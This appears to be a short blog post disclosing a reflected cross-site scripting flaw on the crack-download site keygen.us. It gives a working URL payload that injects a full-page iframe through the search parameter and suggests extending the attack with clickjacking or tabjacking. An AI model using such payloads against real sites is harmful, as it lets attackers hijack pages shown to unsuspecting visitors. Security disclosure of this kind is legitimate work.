KeyGen.us users: vulnerable to XSS attacks

Keygen.us (porn free) is vulnerable to XSS attacks which might be applied on poor users

example:

http://www.keygen.us/search.shtml?q=%22%3E%3Ciframe%20width=”100%”%20height=”100%”%20style=”position:absolute;top:0;left:0″%20src=%22https://xacker.wordpress.com%22%20/%3E&w=cracks

w00ps!

isn’t that my blog ?🙂

This is a simple demonstration, the attack vector might be extended through Clickjacking and/or Tabjacking techniques.

Update: here is a screenshot in case they fix it🙂

Later.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: